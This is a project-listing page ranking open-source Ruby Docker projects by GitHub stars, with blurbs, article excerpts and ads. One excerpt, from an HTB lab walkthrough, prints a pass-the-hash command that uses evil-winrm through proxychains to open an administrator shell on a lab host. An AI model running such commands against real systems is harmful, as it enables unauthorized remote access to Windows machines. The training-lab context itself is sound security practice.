Ruby Docker

Open-source Ruby projects categorized as Docker

Top 23 Ruby Docker Projects

  1. Mastodon

    Your self-hosted, globally interconnected microblogging community

    Project mention: XCancel also down, at least for time being | news.ycombinator.com | 2026-08-25
  2. AppSignal

    Monitoring that respects your time & budget. APM, error tracking, and dashboards for modern web apps. Ten-minute setup, transparent flat pricing, and support from engineers who actually use the product.

    AppSignal logo
  3. chatwoot

    Open-source live-chat, email support, omni-channel desk. An alternative to Intercom, Zendesk, Salesforce Service Cloud etc. 🔥💬

    Project mention: chatwoot VS bund-ai - a user suggested alternative | libhunt.com/r/chatwoot | 2026-08-11
  4. kamal

    Deploy web apps anywhere.

    Project mention: What Active Rubyists Are Using in 2026: A Maintainer's Read of the RubyKaigi Survey | dev.to | 2026-07-03

    Kamal (local runner): ~5

  5. dependabot-core

    🤖 Dependabot's core logic for creating update PRs.

    Project mention: Best DevSecOps Security Tools for CI/CD Pipeline Protection | dev.to | 2026-06-27

    Representative tools: Trivy and Grype both scan lockfiles and dependency manifests for vulnerabilities, open-source and fast. For fixing — not just finding — Dependabot (GitHub-native) and Renovate (works everywhere, including GitLab) open automated PRs that bump vulnerable packages.

  6. evil-winrm

    The ultimate WinRM shell for hacking/pentesting

    Project mention: HTB – AD Enumeration & Attacks – Skills Assessment Part I - Walkthrough - without Metasploit | dev.to | 2026-05-02

    ─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~] └──╼ [★]$ proxychains evil-winrm -i 172.16.6.3 -u Administrator -H 27dedb1dab4d8545c6e1c66fba077da0 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint [proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK PS C:\Users\Administrator\Desktop> whoami [proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK inlanefreight\administrator

  7. wordmove

    Multi-stage command line deploy/mirroring and task runner for Wordpress

  8. dip

    The dip is a CLI dev–tool that provides native-like interaction with a Dockerized application.

  9. Kargo

    Stop Scripting Promotions. Start Shipping with Kargo. Kargo automates promotion across dev, staging, and prod with approval gates and verification. Open source, built by the team behind Argo CD. Download now.

    Kargo logo
  10. rotating-proxy

    Rotating TOR proxy with Docker

  11. docker-rails-example

    A production ready example Rails app that's using Docker and Docker Compose.

    Project mention: Dumb Ways for an Open Source Project to Die | news.ycombinator.com | 2026-05-19

    Another one is how much time it takes to maintain vs how much interest it has. This is different than burnout.

    I created and maintain example Docker Compose starter projects for Flask[0], Rails[1], Django[2] and Node[3]. I've had these going for 6-7 years and I maintain them at least once a week to keep everything up to date.

    I used to also support Phoenix but I stopped after ~5 years because it was the least popular project but also took up more time to upgrade than all of the other example projects combined because Live View has changed in drastic ways so many times.

    Plus it became no longer enjoyable to work on it since I stopped using Phoenix in my day to day as well. That combined with it being the least popular example app between the 5 projects.

    I put together a 6 month plan to archive the repo in https://github.com/nickjj/docker-phoenix-example/issues/16, received zero feedback and then archived it at the start of 2026.

    [0]: https://github.com/nickjj/docker-flask-example

    [1]: https://github.com/nickjj/docker-rails-example

    [2]: https://github.com/nickjj/docker-django-example

    [3]: https://github.com/nickjj/docker-node-example

  12. open-build-service

    Build and distribute Linux packages from sources in an automatic, consistent and reproducible way #obs

    Project mention: Perl 🐪 Weekly #751 - Open Source contributions | dev.to | 2025-12-14

    Ten days ago I participated at an online event organized by the Toronto Perl Mongers. where we had some really nice presentations about OpenQA and the Open Build Service, both written (partially) in Perl. I hope they are going to organize more such events about other projects written in Perl.

  13. cuber-gem

    An open-source automation tool that simplifies the deployment of your apps on Kubernetes.

    Project mention: I Am Building a Cloud | news.ycombinator.com | 2026-04-22

    Kubernetes is not bad, it's just low level. Most applications share the exact same needs (proof: you could run any web app on a simple platform like Heroku). That's why some years ago I built an open source tool (with 0 dependencies) that simplify Kubernetes deployments with a compact syntax which works well for 99% of web apps (instead of allowing any configuration, it makes many "opinionated" choices): https://github.com/cuber-cloud/cuber-gem I have been using it for all the company web apps and web services for years and everything works nicely. It can also auto scale easily and that allows us to manage huge spikes of traffic for web push (Pushpad) at a reasonable price (good luck if you used a VM - no scaling - or if you used a PaaS - very high costs).

  14. docker-registry-browser

    🐳 Web Interface for the Docker Registry HTTP API V2 written in Ruby on Rails.

  15. make-my-server

    Docker Compose with Traefik and lots of services

  16. kuby-core

    A convention over configuration approach for deploying Rails apps. https://getkuby.io

  17. cis-docker-benchmark

    CIS Docker Benchmark - InSpec Profile

  18. morph

    Take the hassle out of web scraping (by openaustralia)

  19. casa

    Volunteer management system for nonprofit CASA, which serves foster youth in counties across America.

  20. rails7-on-docker

    Working Rails 7 demo application running in Docker. No node.js or webpack required.

  21. rails-base-app

    An example of Rails 7 and Vue 3 app which is using Vite, and includes Docker configs for building production images and some of the useful tools to start your projects

  22. nosia

    Self-hosted AI RAG + MCP Platform

    Project mention: Show HN: RAG on Docker Model Runner | news.ycombinator.com | 2025-10-09
  23. kitchen-dokken

    Test Kitchen driver/provisioner for lightning faster Chef Infra cookbook testing with Docker

  24. html2rss-web

    🕸 Turn almost any website into an RSS feed and serve it instantly. Automatic scraping. Start fast with Docker.

  25. SaaSHub

    SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives

    SaaSHub logo
NOTE: The open source projects on this list are ordered by number of github stars. The number of mentions indicates repo mentiontions in the last 12 Months or since we started tracking (Dec 2020).

Ruby Docker discussion

Log in or Post with

Ruby Docker related posts

  • XCancel also down, at least for time being

    4 projects | news.ycombinator.com | 25 Aug 2026
  • Toot.community Is Shutting Down

    1 project | news.ycombinator.com | 30 Jul 2026
  • How I Manage My VPS With Pi’s SSH Extension

    2 projects | dev.to | 6 Jul 2026
  • HTTP/3 on Kamal, and a PR to Basecamp

    2 projects | dev.to | 2 Jul 2026
  • Applying some Rage to Discourse, Mastodon, and GitLab

    3 projects | dev.to | 23 Jun 2026
  • Kamal v2.12.0

    1 project | news.ycombinator.com | 18 Jun 2026
  • What it actually costs to run a one-Rails-app SaaS per month

    1 project | dev.to | 17 Jun 2026
  • A note from our sponsor - AppSignal
    www.appsignal.com | 6 Sep 2026
    APM, error tracking, and dashboards for modern web apps. Ten-minute setup, transparent flat pricing, and support from engineers who actually use the product. Learn more →

Index

What are some of the best open-source Docker projects in Ruby? This list will help you:

# Project Stars
1 Mastodon 50,269
2 chatwoot 36,316
3 kamal 14,561
4 dependabot-core 5,753
5 evil-winrm 5,466
6 wordmove 1,880
7 dip 1,347
8 rotating-proxy 1,216
9 docker-rails-example 1,079
10 open-build-service 1,072
11 meme-search 723
12 cuber-gem 713
13 docker-registry-browser 701
14 make-my-server 591
15 kuby-core 575
16 cis-docker-benchmark 524
17 morph 480
18 casa 380
19 rails7-on-docker 288
20 rails-base-app 233
21 nosia 212
22 kitchen-dokken 207
23 html2rss-web 189

Sponsored
Monitoring that respects your time & budget
APM, error tracking, and dashboards for modern web apps. Ten-minute setup, transparent flat pricing, and support from engineers who actually use the product.
www.appsignal.com

Did you know that Ruby is
the 13th most popular programming language
based on number of references?